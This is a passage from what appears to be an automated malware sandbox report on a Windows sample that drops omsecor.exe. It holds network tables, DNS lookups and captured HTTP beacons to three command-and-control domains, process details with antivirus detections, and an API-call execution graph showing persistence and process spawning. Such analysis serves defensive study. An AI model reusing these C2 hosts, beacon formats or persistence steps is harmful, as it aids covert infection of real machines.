                Dec 5, 2024 18:05:21.614376068 CET804985115.197.204.56192.168.2.7
                Dec 5, 2024 18:05:22.615412951 CET804985115.197.204.56192.168.2.7
                Dec 5, 2024 18:05:22.615654945 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:05:22.732995987 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:22.852768898 CET804985752.34.198.229192.168.2.7
                Dec 5, 2024 18:05:22.853009939 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:22.853296995 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:22.973149061 CET804985752.34.198.229192.168.2.7
                Dec 5, 2024 18:05:24.217924118 CET804985752.34.198.229192.168.2.7
                Dec 5, 2024 18:05:24.217983961 CET804985752.34.198.229192.168.2.7
                Dec 5, 2024 18:05:24.218147039 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:24.218147039 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:24.219597101 CET4985780192.168.2.752.34.198.229
                Dec 5, 2024 18:05:24.334883928 CET4986280192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:24.339363098 CET804985752.34.198.229192.168.2.7
                Dec 5, 2024 18:05:24.454787970 CET8049862193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:24.455008030 CET4986280192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:24.455173969 CET4986280192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:24.575201988 CET8049862193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:46.346301079 CET8049862193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:46.346450090 CET4986280192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:46.346616030 CET4986280192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:46.448956966 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:46.466274023 CET8049862193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:46.568967104 CET8049913193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:46.569144964 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:46.569494009 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:46.689265966 CET8049913193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:08.472119093 CET8049913193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:08.472191095 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:06:08.472381115 CET4991380192.168.2.7193.166.255.171
                Dec 5, 2024 18:06:08.590435982 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.590816021 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.592125893 CET8049913193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:08.710678101 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:08.710761070 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.711038113 CET804985115.197.204.56192.168.2.7
                Dec 5, 2024 18:06:08.711040020 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.711081028 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:06:08.831403017 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:09.820947886 CET804996515.197.204.56192.168.2.7
                Dec 5, 2024 18:06:09.821016073 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:09.944407940 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.065933943 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:10.066041946 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.066677094 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:10.186336994 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.427999020 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.428061962 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.428217888 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.428270102 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.428947926 CET4996980192.168.2.752.34.198.229
                Dec 5, 2024 18:06:11.548582077 CET804996952.34.198.229192.168.2.7
                Dec 5, 2024 18:06:11.667993069 CET4997280192.168.2.7193.166.255.171
                Dec 5, 2024 18:06:11.686968088 CET4996580192.168.2.715.197.204.56
                Dec 5, 2024 18:06:11.787787914 CET8049972193.166.255.171192.168.2.7
                Dec 5, 2024 18:06:11.787935972 CET4997280192.168.2.7193.166.255.171
                TimestampSource PortDest PortSource IPDest IP
                Dec 5, 2024 18:04:07.947885990 CET5399453192.168.2.71.1.1.1
                Dec 5, 2024 18:04:08.407656908 CET53539941.1.1.1192.168.2.7
                Dec 5, 2024 18:04:32.883596897 CET5902453192.168.2.71.1.1.1
                Dec 5, 2024 18:04:33.246804953 CET53590241.1.1.1192.168.2.7
                Dec 5, 2024 18:04:34.591979027 CET5186353192.168.2.71.1.1.1
                Dec 5, 2024 18:04:35.172810078 CET53518631.1.1.1192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 5, 2024 18:04:07.947885990 CET192.168.2.71.1.1.10xb8cfStandard query (0)lousta.netA (IP address)IN (0x0001)false
                Dec 5, 2024 18:04:32.883596897 CET192.168.2.71.1.1.10x652cStandard query (0)mkkuei4kdsz.comA (IP address)IN (0x0001)false
                Dec 5, 2024 18:04:34.591979027 CET192.168.2.71.1.1.10x1fdbStandard query (0)ow5dirasuek.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 5, 2024 18:04:08.407656908 CET1.1.1.1192.168.2.70xb8cfNo error (0)lousta.net193.166.255.171A (IP address)IN (0x0001)false
                Dec 5, 2024 18:04:33.246804953 CET1.1.1.1192.168.2.70x652cNo error (0)mkkuei4kdsz.com15.197.204.56A (IP address)IN (0x0001)false
                Dec 5, 2024 18:04:33.246804953 CET1.1.1.1192.168.2.70x652cNo error (0)mkkuei4kdsz.com3.33.243.145A (IP address)IN (0x0001)false
                Dec 5, 2024 18:04:35.172810078 CET1.1.1.1192.168.2.70x1fdbNo error (0)ow5dirasuek.com52.34.198.229A (IP address)IN (0x0001)false
                • lousta.net
                • mkkuei4kdsz.com
                • ow5dirasuek.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749699193.166.255.171803808C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:08.552088976 CET186OUTGET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive
                Dec 5, 2024 18:04:08.915066957 CET186OUTGET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive
                Dec 5, 2024 18:04:09.274391890 CET186OUTGET /616/595.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749700193.166.255.171803808C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:10.849632978 CET186OUTGET /562/345.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.74974215.197.204.56803808C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:33.367984056 CET190OUTGET /910/77.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:04:34.471554995 CET259INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 05 Dec 2024 17:04:34 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.74974852.34.198.229803808C:\Users\user\AppData\Roaming\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:35.294480085 CET190OUTGET /56/763.html HTTP/1.1
                From: 133778918465242887
                Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Dec 5, 2024 18:04:36.659149885 CET415INHTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:04:36 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.749754193.166.255.171801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:37.187115908 CET186OUTGET /115/685.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.749803193.166.255.171801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:04:59.334496975 CET185OUTGET /54/325.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.74985115.197.204.56801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:05:21.493674040 CET191OUTGET /402/288.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:05:22.615412951 CET259INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 05 Dec 2024 17:05:22 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.74985752.34.198.229801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:05:22.853296995 CET298OUTGET /372/940.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0
                Dec 5, 2024 18:05:24.217924118 CET338INHTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:05:23 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.749862193.166.255.171801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:05:24.455173969 CET186OUTGET /158/950.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.749913193.166.255.171801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:05:46.569494009 CET185OUTGET /352/26.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: lousta.net
                Connection: Keep-Alive


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.74996515.197.204.56801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:06:08.711040020 CET191OUTGET /697/241.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: mkkuei4kdsz.com
                Connection: Keep-Alive
                Dec 5, 2024 18:06:09.820947886 CET259INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 05 Dec 2024 17:06:09 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.74996952.34.198.229801732C:\Windows\SysWOW64\omsecor.exe
                TimestampBytes transferredDirectionData
                Dec 5, 2024 18:06:10.066677094 CET299OUTGET /618/507.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0
                Dec 5, 2024 18:06:11.427999020 CET338INHTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:06:11 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418371|1733418276|35|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:1
                Start time:12:04:06
                Start date:05/12/2024
                Path:C:\Users\user\Desktop\cOviNFmw21.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\cOviNFmw21.exe"
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:73E5F0F01BF8368B8B82432B027610E5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:12:04:06
                Start date:05/12/2024
                Path:C:\Users\user\AppData\Roaming\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:9CB842FFDA5CC91A433FD8C8655C0678
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 96%, ReversingLabs
                Reputation:low
                Has exited:true

                Target ID:11
                Start time:13:36:08
                Start date:05/12/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\omsecor.exe
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:647527DE20AF8BB173C26019E8811EED
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:15
                Start time:13:37:43
                Start date:05/12/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:647527DE20AF8BB173C26019E8811EED
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:3.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:8.2%
                  Total number of Nodes:693
                  Total number of Limit Nodes:13
                  execution_graph 4029 405000 4039 405008 4029->4039 4032 40c5b9 SysFreeString 4033 405103 4032->4033 4034 40c5b9 SysFreeString 4033->4034 4035 405109 4034->4035 4036 40c5b9 SysFreeString 4035->4036 4037 405111 4036->4037 4038 40c5b9 SysFreeString 4037->4038 4040 405120 4038->4040 4046 4050f2 4039->4046 4047 40c43d 4039->4047 4043 4050e2 4045 40be3a HeapFree 4043->4045 4045->4046 4056 40c5b9 4046->4056 4059 40bf60 4047->4059 4050 4050ce 4050->4043 4052 40c00b 4050->4052 4051 40be3a HeapFree 4051->4050 4053 40c01a 4052->4053 4055 40c03b 4052->4055 4054 40bde1 3 API calls 4053->4054 4054->4055 4055->4043 4057 40c5c0 SysFreeString 4056->4057 4058 4050fb 4056->4058 4057->4058 4058->4032 4060 40bf72 4059->4060 4061 40bfbf 4060->4061 4063 40bfa7 wvnsprintfW 4060->4063 4064 40bde1 4060->4064 4061->4050 4061->4051 4063->4060 4065 40bdf2 4064->4065 4066 40bde5 4064->4066 4068 40be0c HeapReAlloc 4065->4068 4069 40bdfc HeapAlloc 4065->4069 4067 40be3a HeapFree 4066->4067 4070 40bdec 4067->4070 4068->4070 4069->4070 4070->4060 4071 409000 4073 40900a 4071->4073 4072 409040 4074 409043 SysFreeString 4072->4074 4073->4072 4073->4074 4075 409058 4073->4075 4076 40912b 4074->4076 4077 409091 GetTickCount 4075->4077 4078 40905f 4075->4078 4084 4090ae 4077->4084 4079 40906a SysAllocString 4078->4079 4082 40908f 4078->4082 4079->4078 4080 409108 SysFreeString 4080->4080 4081 40911b SysFreeString 4080->4081 4081->4076 4082->4080 4082->4081 4083 4090c7 SysAllocString 4083->4084 4084->4082 4084->4083 4085 409301 4086 409314 4085->4086 4087 40931f 4086->4087 4088 40933b CharLowerW 4086->4088 4092 409364 4086->4092 4089 409351 4088->4089 4090 409362 SysFreeString 4089->4090 4091 409359 SysFreeString 4089->4091 4090->4092 4091->4087 4092->4087 4093 4093ae SysAllocString SysAllocString 4092->4093 4094 4093d7 SysFreeString SysFreeString 4093->4094 4094->4087 4096 409581 4097 409591 4096->4097 4098 409595 4097->4098 4099 409599 CharLowerW 4097->4099 4100 4095fb 4099->4100 4102 4095b3 4099->4102 4101 40960a SysFreeString 4100->4101 4102->4100 4102->4101 4103 4095d5 CharLowerW 4102->4103 4104 4095df 4103->4104 4105 409605 SysFreeString 4104->4105 4105->4101 4106 409402 4107 409415 4106->4107 4108 409419 4107->4108 4109 409437 SysFreeString 4107->4109 4109->4108 4110 409883 4111 409890 4110->4111 4116 409655 4111->4116 4114 409655 __VEC_memcpy 4115 4098c7 4114->4115 4118 40966d 4116->4118 4117 40970f 4117->4114 4117->4115 4118->4117 4119 40c5d0 __VEC_memcpy 4118->4119 4119->4117 3834 409445 3837 40945a 3834->3837 3835 40945e 3836 4094a0 SysFreeString SysFreeString 3836->3835 3837->3835 3837->3836 3838 40a345 3840 40a352 3838->3840 3839 40a378 3840->3839 3842 40a442 3840->3842 3844 40a245 3840->3844 3842->3839 3852 40a2d9 3842->3852 3845 40a262 _memset 3844->3845 3846 40a2d6 3844->3846 3847 40a270 SysAllocString SysAllocString 3845->3847 3846->3842 3848 40a2b3 3847->3848 3849 40a2c3 SysFreeString SysFreeString 3848->3849 3858 409fb1 3848->3858 3849->3846 3851 40a2c2 3851->3849 3853 40a2f4 3852->3853 3857 40a2f0 3852->3857 3854 40a313 3853->3854 3855 40a2fe GetProcessHeap HeapFree 3853->3855 3856 409c99 11 API calls 3854->3856 3855->3854 3856->3857 3857->3839 3867 40d258 3858->3867 3860 409fbd GetTickCount 3865 409fd3 3860->3865 3861 409fde GetTickCount 3862 409fea Sleep 3861->3862 3864 40a030 3861->3864 3863 409ff2 PeekMessageW 3862->3863 3863->3865 3866 40a005 DispatchMessageW 3863->3866 3864->3851 3865->3861 3865->3864 3866->3863 3867->3860 3498 40b346 3543 40d5b0 3498->3543 3501 40b37e 3528 40b3db 3501->3528 3590 40ac20 RegOpenKeyExW 3501->3590 3505 40b394 GetModuleFileNameW 3598 4069fd RegCreateKeyExW 3505->3598 3510 40b3f2 Sleep 3514 40a786 35 API calls 3510->3514 3511 40b3c5 3602 40a786 3511->3602 3512 40b3ca GetLastError 3512->3511 3516 40b407 GetModuleFileNameW 3514->3516 3518 40ac20 4 API calls 3516->3518 3517 40b45c 3520 40ac20 4 API calls 3517->3520 3529 40b3d8 3518->3529 3521 40b468 3520->3521 3526 407727 54 API calls 3521->3526 3522 40b426 CopyFileW 3523 40b43f 3522->3523 3522->3528 3527 4077f0 CreateProcessW 3523->3527 3524 40b4b9 ExpandEnvironmentStringsW 3524->3528 3525 40b4cf GetModuleFileNameW 3525->3529 3530 40b474 3526->3530 3540 40b44b 3527->3540 3528->3510 3528->3517 3528->3524 3528->3525 3535 40b44c ExitProcess 3528->3535 3538 40b4fe GetLastError 3528->3538 3545 40b2ce OleInitialize 3528->3545 3554 40aafd 3528->3554 3563 40ab7c GetModuleFileNameW CharLowerW 3528->3563 3568 40abd9 3528->3568 3574 407727 3528->3574 3587 4077f0 3528->3587 3529->3522 3529->3528 3532 40b498 GetLastError 3530->3532 3533 40b47a 3530->3533 3534 40b4a3 3532->3534 3536 4077f0 CreateProcessW 3533->3536 3537 40a786 35 API calls 3534->3537 3539 40b486 3536->3539 3537->3540 3541 40a786 35 API calls 3538->3541 3539->3535 3542 40b48b GetLastError 3539->3542 3540->3535 3541->3529 3542->3534 3544 40b353 GetModuleFileNameW 3543->3544 3544->3501 3548 40b2e2 3545->3548 3549 40b325 InternetCloseHandle 3548->3549 3618 407552 3548->3618 3621 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 3548->3621 3626 40ac93 3548->3626 3643 40b096 3548->3643 3673 40a6c9 3549->3673 3555 40d5b0 3554->3555 3556 40ab0a GetCommandLineW 3555->3556 3557 40ab1a 3556->3557 3558 40ab1f 3557->3558 3559 40ac20 4 API calls 3557->3559 3558->3528 3560 40ab30 3559->3560 3560->3558 3561 40ab35 GetModuleFileNameW CharLowerW CharLowerW 3560->3561 3562 40ab73 3561->3562 3562->3558 3564 40abb6 3563->3564 3565 40abc0 GetCommandLineW 3564->3565 3566 40abbb 3564->3566 3567 40abd0 3565->3567 3566->3528 3567->3528 3569 40ac20 4 API calls 3568->3569 3570 40abf2 3569->3570 3571 40abf7 FindFirstFileW 3570->3571 3572 40ac1a 3570->3572 3571->3572 3573 40ac0e FindClose 3571->3573 3572->3528 3573->3572 3575 40d5b0 3574->3575 3576 407731 GetModuleFileNameW 3575->3576 3577 407753 3576->3577 3581 40776d 3576->3581 3578 4075d4 15 API calls 3577->3578 3582 407764 3578->3582 3579 407774 ExpandEnvironmentStringsW 3820 4075d4 CreateFileW 3579->3820 3581->3579 3581->3582 3583 4077a7 GetLastError 3581->3583 3584 4077bc GetLastError 3581->3584 3582->3528 3586 4077ca 3583->3586 3584->3586 3585 40a786 35 API calls 3585->3586 3586->3581 3586->3585 3830 40d530 3587->3830 3589 407805 CreateProcessW 3589->3528 3591 40ac60 RegOpenKeyExW 3590->3591 3592 40ac4a 3590->3592 3593 40ac78 3591->3593 3594 40ac7c 3591->3594 3832 4069c0 RegQueryValueExW RegCloseKey 3592->3832 3593->3505 3593->3528 3833 4069c0 RegQueryValueExW RegCloseKey 3594->3833 3597 40ac5a 3597->3591 3597->3593 3599 406a30 3598->3599 3600 406a2c 3598->3600 3601 406a39 RegSetValueExW RegCloseKey 3599->3601 3600->3511 3600->3512 3601->3600 3604 40a79c 3602->3604 3605 40a7b3 3602->3605 3603 406d14 2 API calls 3603->3604 3604->3603 3604->3605 3606 40a79e Sleep 3604->3606 3607 406cb5 GetVersionExW 3605->3607 3606->3604 3608 40a83f 3607->3608 3609 4078cb 12 API calls 3608->3609 3610 40a873 3609->3610 3611 40a718 5 API calls 3610->3611 3615 40a87b 3611->3615 3612 40a744 5 API calls 3612->3615 3613 40a894 Sleep 3613->3615 3614 406e69 22 API calls 3614->3615 3615->3612 3615->3613 3615->3614 3616 40a8c7 Sleep 3615->3616 3617 40a8e1 GetProcessHeap HeapFree 3615->3617 3616->3615 3617->3529 3677 40584d 3618->3677 3620 407557 Sleep 3620->3548 3622 4073dd SystemTimeToFileTime SystemTimeToFileTime 3621->3622 3624 407432 3622->3624 3625 40745f SetWaitableTimer WaitForSingleObject CloseHandle 3624->3625 3625->3548 3678 406d14 InternetAttemptConnect 3626->3678 3628 40aca4 3629 40aca9 Sleep 3628->3629 3630 40acbd 3628->3630 3632 406d14 2 API calls 3629->3632 3681 4078cb 3630->3681 3632->3628 3633 40acd4 3688 406cb5 GetVersionExW 3633->3688 3635 40ad09 3690 40a718 3635->3690 3638 40ad71 Sleep 3640 40ad4c 3638->3640 3640->3638 3641 40ad9f Sleep 3640->3641 3642 40adbc 3640->3642 3694 40a744 3640->3694 3698 406e69 3640->3698 3641->3640 3642->3548 3644 40b0a3 3643->3644 3645 40b0bd 3644->3645 3646 40b0cf 3644->3646 3672 40b0ae 3644->3672 3802 407995 3645->3802 3809 407951 3646->3809 3649 40b10d 3651 40b177 InternetClearAllPerSiteCookieDecisions 3649->3651 3652 40b168 InternetSetPerSiteCookieDecisionW 3649->3652 3649->3672 3650 40b0cd 3650->3649 3654 40b0fb GetModuleFileNameW 3650->3654 3653 40b17d 3651->3653 3652->3653 3656 40b186 GetLastError 3653->3656 3657 40b196 3653->3657 3654->3649 3655 40b116 GetCurrentDirectoryW 3654->3655 3655->3649 3658 40a786 35 API calls 3656->3658 3659 40b1b0 CreateThread 3657->3659 3660 40b1e1 3657->3660 3658->3657 3659->3657 3661 40b221 3660->3661 3662 40a786 35 API calls 3660->3662 3664 40b228 CloseHandle 3661->3664 3665 40b23d 3661->3665 3663 40b1f7 3662->3663 3663->3661 3668 40b212 WaitForMultipleObjects 3663->3668 3664->3664 3664->3665 3666 40a6c9 InternetCloseHandle 3665->3666 3667 40b242 InternetClearAllPerSiteCookieDecisions 3666->3667 3669 40b24d 3667->3669 3667->3672 3668->3661 3670 40b261 GetModuleFileNameW 3669->3670 3669->3672 3671 40b27c GetCurrentDirectoryW 3670->3671 3670->3672 3671->3672 3672->3548 3676 